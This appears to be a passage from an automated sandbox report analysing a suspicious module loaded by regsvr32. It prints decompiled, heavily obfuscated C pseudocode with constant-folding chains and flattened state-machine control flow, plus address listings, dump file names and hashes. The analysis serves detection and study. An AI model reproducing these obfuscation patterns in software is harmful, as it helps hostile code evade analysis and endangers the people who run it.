				_v2696 = _v2696 >> 0xe;
				_v2696 = _v2696 + 0x60fe;
				_v2696 = _v2696 ^ 0x00076bcb;
				_v2724 = 0xde50ca;
				_v2724 = _v2724 << 5;
				_v2724 = _v2724 | 0x13de4b45;
				_v2724 = _v2724 >> 3;
				_v2724 = _v2724 ^ 0x0370e8ba;
				_v2632 = 0x6fb4e2;
				_v2632 = _v2632 << 0xa;
				_v2632 = _v2632 ^ 0xbedb2252;
				_v2680 = 0x391472;
				_t539 = 0x60;
				_v2680 = _v2680 * 0x50;
				_v2680 = _v2680 * 0x7f;
				_v2680 = _v2680 ^ 0xd95a4585;
				_v2732 = 0x43aaa1;
				_v2732 = _v2732 / _t539;
				_v2732 = _v2732 + 0xfffff83e;
				_v2732 = _v2732 | 0xd088b622;
				_v2732 = _v2732 ^ 0xd0822457;
				_v2664 = 0xd2d120;
				_t540 = 0xa;
				_t509 = _v2664 / _t540;
				_v2664 = _t509;
				_v2664 = _v2664 | 0x0130d72a;
				_v2664 = _v2664 ^ 0x013183f8;
				_v2672 = 0xf6d933;
				_v2672 = _v2672 ^ 0xf71e6f53;
				_v2672 = _v2672 ^ 0x218b367a;
				_v2672 = _v2672 ^ 0xd6691ebb;
				_v2716 = 0x3f87a6;
				_v2716 = _v2716 << 5;
				_v2716 = _v2716 ^ 0xe267617b;
				_v2716 = _v2716 + 0xfffff440;
				_v2716 = _v2716 ^ 0xe594c8d8;
				_v2624 = 0xab7401;
				_v2624 = _v2624 + 0x89d4;
				_v2624 = _v2624 ^ 0x00aaff96;
				while(_t595 != 0x864531) {
					if(_t595 == 0x2b81e36) {
						_t595 = 0x74f4821;
						continue;
					} else {
						_t606 = _t595 - 0x74f4821;
						if(_t595 != 0x74f4821) {
							L8:
							__eflags = _t595 - 0x6c3f2c3;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E001C0575(_v2708, _v2784, _t606, _t540,  &_v2600, _v2752);
							 *((short*)(E001A2263( &_v2600, _v2644, _v2776, _v2720))) = 0;
							E001B9054(_v2768,  &_v1560, _t606, _v2604, _v2652, _v2744);
							_push(_v2684);
							_push(0x1a1188);
							_push(_v2728);
							E001B8EB3( &_v2600, _t606, _v2608, _v2760, _v2792,  &_v2080, _v2660, E001BF5D9(_v2760, _v2700, _t606), _v2736);
							E001BF94B(_t521, _v2616, _v2636, _v2668, _v2788);
							_t540 =  &_v2080;
							_t509 = E001C05F6( &_v2080, _t594, _v2676, _v2780, _v2628, _v2692);
							_t599 =  &(_t599[0x19]);
							if(_t509 != 0) {
								_t595 = 0x864531;
								continue;
							}
						}
					}
					return _t509;
				}
				_t444 =  &_v2764; // 0x6e7c4d
				E001A3466(_v2756, _v2656, _t540, _t540,  &_v1040,  *_t444, _t540, _v2772, _v2620, _v2612);
				_push(_v2712);
				_push(0x1a1228);
				_push(_v2704);
				_t596 = E001BF5D9(_v2640, _v2648, __eflags);
				E001B8EB3( &_v1040, __eflags, _v2688, _v2640, _v2740,  &_v520, _v2748, _t512, _v2696);
				E001BF94B(_t596, _v2724, _v2632, _v2680, _v2732);
				__eflags = 0;
				_t540 = _v2664;
				_t509 = E001B4E54(_v2664, 0, 0,  &_v520, 0, _v2672, 0, _v2716, _t596, _v2624);
				_t599 =  &(_t599[0x1c]);
				_t595 = 0x6c3f2c3;
				goto L8;
			}









































































                                                                                                                0x001b9a0c
                                                                                                                0x001b9a12
                                                                                                                0x001b9a1c
                                                                                                                0x001b9a21
                                                                                                                0x001b9a30
                                                                                                                0x001b9a32
                                                                                                                0x001b9a37
                                                                                                                0x001b9a3c
                                                                                                                0x001b9a42
                                                                                                                0x001b9a4a
                                                                                                                0x001b9a52
                                                                                                                0x001b9a57
                                                                                                                0x001b9a5f
                                                                                                                0x001b9a67
                                                                                                                0x001b9a6f
                                                                                                                0x001b9a77
                                                                                                                0x001b9a7c
                                                                                                                0x001b9a81
                                                                                                                0x001b9a89
                                                                                                                0x001b9a96
                                                                                                                0x001b9a99
                                                                                                                0x001b9aa2
                                                                                                                0x001b9aa6
                                                                                                                0x001b9aae
                                                                                                                0x001b9ab6
                                                                                                                0x001b9ac1
                                                                                                                0x001b9ac9
                                                                                                                0x001b9ad4
                                                                                                                0x001b9adc
                                                                                                                0x001b9ae4
                                                                                                                0x001b9aec
                                                                                                                0x001b9af4
                                                                                                                0x001b9afc
                                                                                                                0x001b9b0c
                                                                                                                0x001b9b10
                                                                                                                0x001b9b1c
                                                                                                                0x001b9b21
                                                                                                                0x001b9b27
                                                                                                                0x001b9b2f
                                                                                                                0x001b9b37
                                                                                                                0x001b9b3c
                                                                                                                0x001b9b49
                                                                                                                0x001b9b4c
                                                                                                                0x001b9b4d
                                                                                                                0x001b9b51
                                                                                                                0x001b9b59
                                                                                                                0x001b9b6f
                                                                                                                0x001b9b76
                                                                                                                0x001b9b81
                                                                                                                0x001b9b8c
                                                                                                                0x001b9b97
                                                                                                                0x001b9ba2
                                                                                                                0x001b9baa
                                                                                                                0x001b9bb8
                                                                                                                0x001b9bbc
                                                                                                                0x001b9bc1
                                                                                                                0x001b9bcb
                                                                                                                0x001b9bd3
                                                                                                                0x001b9bdb
                                                                                                                0x001b9be3
                                                                                                                0x001b9be8
                                                                                                                0x001b9bf0
                                                                                                                0x001b9bf8
                                                                                                                0x001b9bfd
                                                                                                                0x001b9c01
                                                                                                                0x001b9c09
                                                                                                                0x001b9c17
                                                                                                                0x001b9c1c
                                                                                                                0x001b9c22
                                                                                                                0x001b9c27
                                                                                                                0x001b9c2c
                                                                                                                0x001b9c34
                                                                                                                0x001b9c3f
                                                                                                                0x001b9c52
                                                                                                                0x001b9c55
                                                                                                                0x001b9c5c
                                                                                                                0x001b9c67
                                                                                                                0x001b9c72
                                                                                                                0x001b9c7d
                                                                                                                0x001b9c88
                                                                                                                0x001b9c90
                                                                                                                0x001b9c98
                                                                                                                0x001b9ca0
                                                                                                                0x001b9ca5
                                                                                                                0x001b9cad
                                                                                                                0x001b9cc0
                                                                                                                0x001b9cc7
                                                                                                                0x001b9cd2
                                                                                                                0x001b9cda
                                                                                                                0x001b9ce2
                                                                                                                0x001b9cef
                                                                                                                0x001b9cf3
                                                                                                                0x001b9cfb
                                                                                                                0x001b9d06
                                                                                                                0x001b9d11
                                                                                                                0x001b9d1c
                                                                                                                0x001b9d27
                                                                                                                0x001b9d2f
                                                                                                                0x001b9d3a
                                                                                                                0x001b9d45
                                                                                                                0x001b9d4d
                                                                                                                0x001b9d58
                                                                                                                0x001b9d63
                                                                                                                0x001b9d6b
                                                                                                                0x001b9d73
                                                                                                                0x001b9d78
                                                                                                                0x001b9d80
                                                                                                                0x001b9d88
                                                                                                                0x001b9d93
                                                                                                                0x001b9d9e
                                                                                                                0x001b9da5
                                                                                                                0x001b9dae
                                                                                                                0x001b9daf
                                                                                                                0x001b9db8
                                                                                                                0x001b9dc3
                                                                                                                0x001b9dd3
                                                                                                                0x001b9ddd
                                                                                                                0x001b9de2
                                                                                                                0x001b9dec
                                                                                                                0x001b9df1
                                                                                                                0x001b9df7
                                                                                                                0x001b9dff
                                                                                                                0x001b9e0a
                                                                                                                0x001b9e12
                                                                                                                0x001b9e1d
                                                                                                                0x001b9e2a
                                                                                                                0x001b9e2d
                                                                                                                0x001b9e31
                                                                                                                0x001b9e39
                                                                                                                0x001b9e41
                                                                                                                0x001b9e4c
                                                                                                                0x001b9e57
                                                                                                                0x001b9e62
                                                                                                                0x001b9e6a
                                                                                                                0x001b9e74
                                                                                                                0x001b9e78
                                                                                                                0x001b9e80
                                                                                                                0x001b9e88
                                                                                                                0x001b9e90
                                                                                                                0x001b9e95
                                                                                                                0x001b9e9a
                                                                                                                0x001b9ea2
                                                                                                                0x001b9eaa
                                                                                                                0x001b9ebd
                                                                                                                0x001b9ec4
                                                                                                                0x001b9ecf
                                                                                                                0x001b9eda
                                                                                                                0x001b9ee5
                                                                                                                0x001b9ef0
                                                                                                                0x001b9efb
                                                                                                                0x001b9f06
                                                                                                                0x001b9f11
                                                                                                                0x001b9f1c
                                                                                                                0x001b9f27
                                                                                                                0x001b9f32
                                                                                                                0x001b9f3a
                                                                                                                0x001b9f42
                                                                                                                0x001b9f4a
                                                                                                                0x001b9f52
                                                                                                                0x001b9f62
                                                                                                                0x001b9f66
                                                                                                                0x001b9f6b
                                                                                                                0x001b9f73
                                                                                                                0x001b9f7b
                                                                                                                0x001b9f88
                                                                                                                0x001b9f89
                                                                                                                0x001b9f8d
                                                                                                                0x001b9f95
                                                                                                                0x001b9fa3
                                                                                                                0x001b9fac
                                                                                                                0x001b9fb0
                                                                                                                0x001b9fb8
                                                                                                                0x001b9fc0
                                                                                                                0x001b9fc8
                                                                                                                0x001b9fcd
                                                                                                                0x001b9fd2
                                                                                                                0x001b9fd7
                                                                                                                0x001b9fdf
                                                                                                                0x001b9fe7
                                                                                                                0x001b9fec
                                                                                                                0x001b9ff4
                                                                                                                0x001b9ffe
                                                                                                                0x001ba00b
                                                                                                                0x001ba015
                                                                                                                0x001ba01d
                                                                                                                0x001ba022
                                                                                                                0x001ba02a
                                                                                                                0x001ba035
                                                                                                                0x001ba03d
                                                                                                                0x001ba048
                                                                                                                0x001ba05d
                                                                                                                0x001ba060
                                                                                                                0x001ba06f
                                                                                                                0x001ba076
                                                                                                                0x001ba081
                                                                                                                0x001ba091
                                                                                                                0x001ba095
                                                                                                                0x001ba09d
                                                                                                                0x001ba0a5
                                                                                                                0x001ba0ad
                                                                                                                0x001ba0bf
                                                                                                                0x001ba0c0
                                                                                                                0x001ba0c2
                                                                                                                0x001ba0c9
                                                                                                                0x001ba0d4
                                                                                                                0x001ba0df
                                                                                                                0x001ba0ea
                                                                                                                0x001ba0f5
                                                                                                                0x001ba100
                                                                                                                0x001ba10b
                                                                                                                0x001ba113
                                                                                                                0x001ba118
                                                                                                                0x001ba120
                                                                                                                0x001ba128
                                                                                                                0x001ba130
                                                                                                                0x001ba13b
                                                                                                                0x001ba146
                                                                                                                0x001ba151
                                                                                                                0x001ba15f
                                                                                                                0x001ba27a
                                                                                                                0x00000000
                                                                                                                0x001ba165
                                                                                                                0x001ba165
                                                                                                                0x001ba167
                                                                                                                0x001ba362
                                                                                                                0x001ba362
                                                                                                                0x001ba368
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ba16d
                                                                                                                0x001ba182
                                                                                                                0x001ba1b6
                                                                                                                0x001ba1c4
                                                                                                                0x001ba1c9
                                                                                                                0x001ba1d0
                                                                                                                0x001ba1d5
                                                                                                                0x001ba21c
                                                                                                                0x001ba23c
                                                                                                                0x001ba24a
                                                                                                                0x001ba263
                                                                                                                0x001ba268
                                                                                                                0x001ba26d
                                                                                                                0x001ba273
                                                                                                                0x00000000
                                                                                                                0x001ba273
                                                                                                                0x001ba26d
                                                                                                                0x001ba167
                                                                                                                0x001ba378
                                                                                                                0x001ba378
                                                                                                                0x001ba29b
                                                                                                                0x001ba2ad
                                                                                                                0x001ba2b2
                                                                                                                0x001ba2b9
                                                                                                                0x001ba2be
                                                                                                                0x001ba2e2
                                                                                                                0x001ba308
                                                                                                                0x001ba325
                                                                                                                0x001ba334
                                                                                                                0x001ba34b
                                                                                                                0x001ba355
                                                                                                                0x001ba35a
                                                                                                                0x001ba35d
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "Y$-PA$4z{$7l$M|nT$W$\f1i${ag$W$]
                                                                                                                • API String ID: 0-1096841937
                                                                                                                • Opcode ID: 3156205b1c79eb181d8ad058a095d7d3ac9c51357d7c30ef6836e9f9165450e3
                                                                                                                • Instruction ID: 1e3087faff54dca7d7dbad4b4db85757516fcf07f364668b195a598418ae3142
                                                                                                                • Opcode Fuzzy Hash: 3156205b1c79eb181d8ad058a095d7d3ac9c51357d7c30ef6836e9f9165450e3
                                                                                                                • Instruction Fuzzy Hash: E522D171508380DFE3A9CF65C54AA9BFBE2BBC4708F108A1DE1D996260D7B58949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A2710 Relevance: 12.8, Strings: 10, Instructions: 327COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001A2710(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t393;
				void* _t396;
				void* _t404;
				intOrPtr _t405;
				void* _t410;
				signed int _t413;
				signed int _t414;
				intOrPtr* _t441;
				void* _t445;
				signed int* _t446;

				_t446 =  &_v180;
				_v168 = 0x59659b;
				_v168 = _v168 | 0x98495c95;
				_v168 = _v168 * 0x2b;
				_t441 = __ecx;
				_v168 = _v168 | 0x53e54cf1;
				_t445 = 0;
				_v168 = _v168 ^ 0xd7ed5df5;
				_t410 = 0x65ddf49;
				_v72 = 0xa6314f;
				_v4 = __ecx;
				_v72 = _v72 * 0x3a;
				_v72 = _v72 + 0xcf4d;
				_v72 = _v72 ^ 0x25a7fb33;
				_v164 = 0x7e3ee;
				_v164 = _v164 + 0xffffbebb;
				_v164 = _v164 << 4;
				_v164 = _v164 >> 7;
				_v164 = _v164 ^ 0x0000f455;
				_v156 = 0x8c5b8f;
				_v156 = _v156 >> 6;
				_v156 = _v156 << 4;
				_v156 = _v156 ^ 0x7fb0e770;
				_v156 = _v156 ^ 0x7f93f190;
				_v20 = 0x2734a0;
				_v20 = _v20 + 0x711a;
				_v20 = _v20 ^ 0x0027a5ba;
				_v32 = 0xd3ef24;
				_v32 = _v32 | 0x3c96abc4;
				_v32 = _v32 ^ 0x3cd6bfc0;
				_v100 = 0x4c9037;
				_v100 = _v100 * 0x12;
				_v100 = _v100 ^ 0xc27fa940;
				_v100 = _v100 ^ 0xc71847ef;
				_v68 = 0xa7e3e1;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 | 0xb27e4612;
				_v68 = _v68 ^ 0xb27287c0;
				_v148 = 0x3f4e1b;
				_v148 = _v148 + 0x5679;
				_v148 = _v148 << 0xd;
				_v148 = _v148 << 0xb;
				_v148 = _v148 ^ 0x940c92e7;
				_v88 = 0x6b38c6;
				_v88 = _v88 | 0xf30843da;
				_v88 = _v88 + 0xffff5c59;
				_v88 = _v88 ^ 0xf36e812a;
				_v96 = 0x351a34;
				_v96 = _v96 + 0x9fcc;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0x035ac0a2;
				_v48 = 0xcebbc2;
				_v48 = _v48 + 0xffff35e1;
				_v48 = _v48 ^ 0x00cc7519;
				_v16 = 0xd0f52a;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x000478e1;
				_v44 = 0xff389d;
				_v44 = _v44 | 0x80dbed3e;
				_v44 = _v44 ^ 0x80f0fe7c;
				_v80 = 0xee2b08;
				_v80 = _v80 * 0x1e;
				_v80 = _v80 * 9;
				_v80 = _v80 ^ 0xfb3beca4;
				_v176 = 0x9c4d64;
				_v176 = _v176 + 0x6779;
				_v176 = _v176 >> 7;
				_v176 = _v176 * 0x4e;
				_v176 = _v176 ^ 0x0056d06b;
				_v180 = 0x2ba105;
				_v180 = _v180 + 0xffff28cd;
				_v180 = _v180 >> 0xb;
				_v180 = _v180 + 0x633b;
				_v180 = _v180 ^ 0x000d9041;
				_v28 = 0x446d00;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 ^ 0x000b6aec;
				_v64 = 0xe45e7b;
				_v64 = _v64 + 0x6f2f;
				_v64 = _v64 | 0x7a241b84;
				_v64 = _v64 ^ 0x7ae55bf2;
				_v36 = 0xef1165;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 ^ 0x00009995;
				_v160 = 0xa971e5;
				_v160 = _v160 >> 0x10;
				_v160 = _v160 | 0x6a5dff56;
				_v160 = _v160 + 0xa6a;
				_v160 = _v160 ^ 0x6a580dcb;
				_v136 = 0x3e547b;
				_v136 = _v136 ^ 0x308871cd;
				_t413 = 0x77;
				_v136 = _v136 * 0x6a;
				_v136 = _v136 >> 0xa;
				_v136 = _v136 ^ 0x000711df;
				_v144 = 0x4f010f;
				_v144 = _v144 * 0x21;
				_v144 = _v144 + 0xeaa2;
				_v144 = _v144 >> 5;
				_v144 = _v144 ^ 0x005edee1;
				_v104 = 0x44e9f4;
				_v104 = _v104 << 6;
				_v104 = _v104 >> 0xb;
				_v104 = _v104 ^ 0x00085e98;
				_v152 = 0x1ba241;
				_v152 = _v152 + 0xff60;
				_v152 = _v152 << 7;
				_v152 = _v152 ^ 0x82eca48f;
				_v152 = _v152 ^ 0x8cb0e99d;
				_v56 = 0x7a6bc3;
				_v56 = _v56 | 0x93e67637;
				_v56 = _v56 + 0x2da9;
				_v56 = _v56 ^ 0x93f0bf64;
				_v172 = 0x8c8286;
				_v172 = _v172 >> 5;
				_v172 = _v172 ^ 0x42c2470c;
				_v172 = _v172 + 0xffff02fc;
				_v172 = _v172 ^ 0x42c8573d;
				_v60 = 0x25c2ad;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 + 0x911;
				_v60 = _v60 ^ 0x0005c1ac;
				_v116 = 0x6ecdd3;
				_v116 = _v116 * 0x79;
				_v116 = _v116 * 0x35;
				_v116 = _v116 * 0x74;
				_v116 = _v116 ^ 0xc0488b75;
				_v40 = 0x28ed11;
				_v40 = _v40 + 0x8779;
				_v40 = _v40 ^ 0x0024254d;
				_v92 = 0xca537b;
				_v92 = _v92 << 1;
				_v92 = _v92 | 0x31ea098b;
				_v92 = _v92 ^ 0x31fd2b22;
				_v124 = 0xc18ad1;
				_v124 = _v124 + 0xf8f0;
				_v124 = _v124 + 0xd15d;
				_v124 = _v124 / _t413;
				_v124 = _v124 ^ 0x0006dd8a;
				_v24 = 0x9933e6;
				_v24 = _v24 | 0x21a6ea10;
				_v24 = _v24 ^ 0x21bdeba3;
				_v140 = 0x501828;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 ^ 0xcc9d183e;
				_v140 = _v140 << 0xe;
				_v140 = _v140 ^ 0x430732f0;
				_v52 = 0xf4243d;
				_v52 = _v52 + 0xe76b;
				_v52 = _v52 ^ 0x00ff3a3a;
				_v76 = 0xeacad3;
				_v76 = _v76 >> 3;
				_v76 = _v76 << 0xd;
				_v76 = _v76 ^ 0xab2caf0b;
				_v12 = 0xaa955a;
				_v12 = _v12 + 0x8e70;
				_v12 = _v12 ^ 0x00af2781;
				_v84 = 0x8d6e17;
				_v84 = _v84 | 0xd6e33bc8;
				_v84 = _v84 << 1;
				_v84 = _v84 ^ 0xadd45833;
				_v108 = 0x2aab73;
				_v108 = _v108 >> 2;
				_t414 = 0x3a;
				_v108 = _v108 / _t414;
				_v108 = _v108 ^ 0x0009697d;
				_v132 = 0x19904;
				_v132 = _v132 >> 5;
				_v132 = _v132 * 0x7d;
				_v132 = _v132 >> 6;
				_v132 = _v132 ^ 0x000b557a;
				_v112 = 0x4318ce;
				_v112 = _v112 ^ 0xb8e53099;
				_v112 = _v112 + 0xffff40be;
				_v112 = _v112 ^ 0xb8abcfbd;
				_v120 = 0x748122;
				_v120 = _v120 * 0x23;
				_v120 = _v120 * 0x56;
				_v120 = _v120 + 0x4ab7;
				_v120 = _v120 ^ 0x59dce155;
				_v128 = 0xd31fe6;
				_v128 = _v128 ^ 0x39aa7bb1;
				_v128 = _v128 ^ 0x1455549a;
				_v128 = _v128 * 0x62;
				_v128 = _v128 ^ 0x4aecef1a;
				while(1) {
					L1:
					_t393 = 0xc8cbe9b;
					do {
						if(_t410 == 0x65ddf49) {
							_t410 = 0x8517f81;
							goto L9;
						} else {
							if(_t410 == 0x6e632eb) {
								E001B2519(_v112, _v8, _v120, _v20, _v128);
							} else {
								if(_t410 == 0x8517f81) {
									_push(_v148);
									_push(0x1a1604);
									_push(_v68);
									_t396 = E001BF5D9(_v32, _v100, __eflags);
									_push(_v16);
									_push(0x1a1504);
									_push(_v48);
									__eflags = E001AD2C9(_t396, _v168, _v44, _v80,  &_v8, _v176, _v180, E001BF5D9(_v88, _v96, __eflags)) - _v72;
									_t410 =  ==  ? 0xc8cbe9b : 0xed06072;
									E001BF94B(_t396, _v28, _v64, _v36, _v160);
									E001BF94B(_t397, _v136, _v144, _v104, _v152);
									_t441 = _v4;
									_t446 =  &(_t446[0x12]);
									_t393 = 0xc8cbe9b;
									goto L9;
								} else {
									_t453 = _t410 - _t393;
									if(_t410 != _t393) {
										goto L9;
									} else {
										_push(_v116);
										_push(0x1a1544);
										_push(_v60);
										_t404 = E001BF5D9(_v56, _v172, _t453);
										_t405 =  *0x1c4208; // 0x0
										E001A866C(_v40,  *((intOrPtr*)(_t441 + 4)), _v92, _v124, _t405 + 0x14, _v24, _v8, _v164,  *_t441, _v140, _v52, _v76, _v56, _t404);
										_t410 = 0x6e632eb;
										_t445 =  ==  ? 1 : _t445;
										E001BF94B(_t404, _v12, _v84, _v108, _v132);
										_t446 =  &(_t446[0x12]);
										goto L1;
									}
								}
							}
						}
						L12:
						return _t445;
						L9:
						__eflags = _t410 - 0xed06072;
					} while (__eflags != 0);
					goto L12;
				}
			}


























































                                                                                                                0x001a2710
                                                                                                                0x001a2716
                                                                                                                0x001a271e
                                                                                                                0x001a272f
                                                                                                                0x001a2733
                                                                                                                0x001a2735
                                                                                                                0x001a273d
                                                                                                                0x001a273f
                                                                                                                0x001a2747
                                                                                                                0x001a274c
                                                                                                                0x001a2759
                                                                                                                0x001a2760
                                                                                                                0x001a2764
                                                                                                                0x001a276c
                                                                                                                0x001a2774
                                                                                                                0x001a277c
                                                                                                                0x001a2784
                                                                                                                0x001a2789
                                                                                                                0x001a278e
                                                                                                                0x001a2796
                                                                                                                0x001a279e
                                                                                                                0x001a27a3
                                                                                                                0x001a27a8
                                                                                                                0x001a27b0
                                                                                                                0x001a27b8
                                                                                                                0x001a27c3
                                                                                                                0x001a27ce
                                                                                                                0x001a27d9
                                                                                                                0x001a27e4
                                                                                                                0x001a27ef
                                                                                                                0x001a27fa
                                                                                                                0x001a2807
                                                                                                                0x001a280b
                                                                                                                0x001a2813
                                                                                                                0x001a281b
                                                                                                                0x001a2826
                                                                                                                0x001a282e
                                                                                                                0x001a2839
                                                                                                                0x001a2844
                                                                                                                0x001a284c
                                                                                                                0x001a2854
                                                                                                                0x001a2859
                                                                                                                0x001a285e
                                                                                                                0x001a2866
                                                                                                                0x001a286e
                                                                                                                0x001a2876
                                                                                                                0x001a287e
                                                                                                                0x001a2886
                                                                                                                0x001a288e
                                                                                                                0x001a2896
                                                                                                                0x001a289b
                                                                                                                0x001a28a3
                                                                                                                0x001a28ae
                                                                                                                0x001a28b9
                                                                                                                0x001a28c4
                                                                                                                0x001a28cf
                                                                                                                0x001a28d7
                                                                                                                0x001a28e2
                                                                                                                0x001a28ed
                                                                                                                0x001a28f8
                                                                                                                0x001a2903
                                                                                                                0x001a2910
                                                                                                                0x001a2919
                                                                                                                0x001a291d
                                                                                                                0x001a2925
                                                                                                                0x001a292d
                                                                                                                0x001a2935
                                                                                                                0x001a293f
                                                                                                                0x001a2943
                                                                                                                0x001a294b
                                                                                                                0x001a2953
                                                                                                                0x001a295b
                                                                                                                0x001a2960
                                                                                                                0x001a296a
                                                                                                                0x001a2972
                                                                                                                0x001a297d
                                                                                                                0x001a2985
                                                                                                                0x001a2990
                                                                                                                0x001a299b
                                                                                                                0x001a29a6
                                                                                                                0x001a29b1
                                                                                                                0x001a29bc
                                                                                                                0x001a29c7
                                                                                                                0x001a29cf
                                                                                                                0x001a29da
                                                                                                                0x001a29e2
                                                                                                                0x001a29e7
                                                                                                                0x001a29ef
                                                                                                                0x001a29f7
                                                                                                                0x001a29ff
                                                                                                                0x001a2a07
                                                                                                                0x001a2a16
                                                                                                                0x001a2a17
                                                                                                                0x001a2a1b
                                                                                                                0x001a2a20
                                                                                                                0x001a2a28
                                                                                                                0x001a2a35
                                                                                                                0x001a2a39
                                                                                                                0x001a2a41
                                                                                                                0x001a2a46
                                                                                                                0x001a2a4e
                                                                                                                0x001a2a56
                                                                                                                0x001a2a5b
                                                                                                                0x001a2a60
                                                                                                                0x001a2a68
                                                                                                                0x001a2a70
                                                                                                                0x001a2a78
                                                                                                                0x001a2a7d
                                                                                                                0x001a2a85
                                                                                                                0x001a2a8d
                                                                                                                0x001a2a98
                                                                                                                0x001a2aa3
                                                                                                                0x001a2aae
                                                                                                                0x001a2ab9
                                                                                                                0x001a2ac1
                                                                                                                0x001a2ac6
                                                                                                                0x001a2ace
                                                                                                                0x001a2ad6
                                                                                                                0x001a2ade
                                                                                                                0x001a2ae9
                                                                                                                0x001a2af1
                                                                                                                0x001a2afc
                                                                                                                0x001a2b07
                                                                                                                0x001a2b14
                                                                                                                0x001a2b1d
                                                                                                                0x001a2b26
                                                                                                                0x001a2b2a
                                                                                                                0x001a2b32
                                                                                                                0x001a2b3d
                                                                                                                0x001a2b48
                                                                                                                0x001a2b53
                                                                                                                0x001a2b5b
                                                                                                                0x001a2b5f
                                                                                                                0x001a2b67
                                                                                                                0x001a2b6f
                                                                                                                0x001a2b77
                                                                                                                0x001a2b7f
                                                                                                                0x001a2b8d
                                                                                                                0x001a2b91
                                                                                                                0x001a2b99
                                                                                                                0x001a2ba4
                                                                                                                0x001a2baf
                                                                                                                0x001a2bba
                                                                                                                0x001a2bc2
                                                                                                                0x001a2bc7
                                                                                                                0x001a2bd1
                                                                                                                0x001a2bd6
                                                                                                                0x001a2bde
                                                                                                                0x001a2be9
                                                                                                                0x001a2bf4
                                                                                                                0x001a2bff
                                                                                                                0x001a2c07
                                                                                                                0x001a2c0c
                                                                                                                0x001a2c11
                                                                                                                0x001a2c19
                                                                                                                0x001a2c24
                                                                                                                0x001a2c2f
                                                                                                                0x001a2c3a
                                                                                                                0x001a2c42
                                                                                                                0x001a2c4a
                                                                                                                0x001a2c4e
                                                                                                                0x001a2c56
                                                                                                                0x001a2c5e
                                                                                                                0x001a2c69
                                                                                                                0x001a2c6c
                                                                                                                0x001a2c70
                                                                                                                0x001a2c78
                                                                                                                0x001a2c80
                                                                                                                0x001a2c8a
                                                                                                                0x001a2c8e
                                                                                                                0x001a2c93
                                                                                                                0x001a2c9b
                                                                                                                0x001a2ca3
                                                                                                                0x001a2cab
                                                                                                                0x001a2cbb
                                                                                                                0x001a2cc3
                                                                                                                0x001a2cd0
                                                                                                                0x001a2cd9
                                                                                                                0x001a2cdd
                                                                                                                0x001a2ce5
                                                                                                                0x001a2ced
                                                                                                                0x001a2cf5
                                                                                                                0x001a2cfd
                                                                                                                0x001a2d0a
                                                                                                                0x001a2d0e
                                                                                                                0x001a2d16
                                                                                                                0x001a2d16
                                                                                                                0x001a2d16
                                                                                                                0x001a2d1b
                                                                                                                0x001a2d21
                                                                                                                0x001a2ec9
                                                                                                                0x00000000
                                                                                                                0x001a2d27
                                                                                                                0x001a2d2d
                                                                                                                0x001a2ef6
                                                                                                                0x001a2d33
                                                                                                                0x001a2d39
                                                                                                                0x001a2df2
                                                                                                                0x001a2df6
                                                                                                                0x001a2dfb
                                                                                                                0x001a2e0d
                                                                                                                0x001a2e12
                                                                                                                0x001a2e1b
                                                                                                                0x001a2e20
                                                                                                                0x001a2e71
                                                                                                                0x001a2e85
                                                                                                                0x001a2e96
                                                                                                                0x001a2eb3
                                                                                                                0x001a2eb8
                                                                                                                0x001a2ebf
                                                                                                                0x001a2ec2
                                                                                                                0x00000000
                                                                                                                0x001a2d3f
                                                                                                                0x001a2d3f
                                                                                                                0x001a2d41
                                                                                                                0x00000000
                                                                                                                0x001a2d47
                                                                                                                0x001a2d47
                                                                                                                0x001a2d4b
                                                                                                                0x001a2d50
                                                                                                                0x001a2d62
                                                                                                                0x001a2d94
                                                                                                                0x001a2db2
                                                                                                                0x001a2dc6
                                                                                                                0x001a2dd2
                                                                                                                0x001a2de5
                                                                                                                0x001a2dea
                                                                                                                0x00000000
                                                                                                                0x001a2dea
                                                                                                                0x001a2d41
                                                                                                                0x001a2d39
                                                                                                                0x001a2d2d
                                                                                                                0x001a2f00
                                                                                                                0x001a2f0a
                                                                                                                0x001a2ece
                                                                                                                0x001a2ece
                                                                                                                0x001a2ece
                                                                                                                0x00000000
                                                                                                                0x001a2eda

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
